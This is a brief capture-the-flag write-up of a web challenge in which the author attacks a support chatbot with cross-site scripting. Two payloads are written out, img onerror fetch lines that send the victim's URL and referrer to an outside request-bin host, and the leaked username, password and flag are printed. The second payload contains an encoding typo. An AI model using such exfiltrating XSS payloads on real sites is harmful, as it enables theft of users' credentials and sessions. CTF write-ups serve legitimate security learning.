Rating: 5.0
This challenge comes with the following instructions:
Try chatting with tech support about getting a flag.
Note: We have received multiple reports of exploits not working remotely, but we triple checked and concluded that the bot is working properly.
https://typeselfsub.web.ctfcompetition.com/
This URL leads to a website for "Company x":
We must regiter to continue:
After logging in, two new URLs are available in the main menu. https://typeselfsub.web.ctfcompetition.com/flag:
And https://typeselfsub.web.ctfcompetition.com/chat, where we can send chat messages.
The goal of this challenge is to perform an XSS attack on the chat user we are messaging in order to exfiltrate the flag.
We will iniate the chat with this message and use PTS to observe network requests.
<img src=x onerror=fetch('https://ptsv2.com/t/xxxxx-xxxxxxxxxx/post?x='%2blocation.href)>
Note that "+" has to be encoded as "%2b". We can see that the chat user is currently at https://typeselfsub-support.web.ctfcompetition.com/static/chat.html
.
We observe that the following pages are located on different subdomains:
Due to CORS restrictions, it is not possible to simply have the chat user fech the flag and to pass it to us.
Through trial and error, we find the solution in a different approach:
<img src=x onerror=fetch('https://ptsv2.com/t/xxxxx-xxxxxxxxxx/post?x='%2document.referrer)>
Note that the different parameters in the image are actually part of the referrer. Stitching it back together, we get this URL: https://typeselfsub.web.ctfcompetition.com/asofdiyboxzdfasdfyryryryccc?username=mike&password=j9as7ya7a3636ncvx&reason=
We are now logged in as Mike and can grab the flag:
Flag: CTF{self-xss?-that-isn't-a-problem-right...}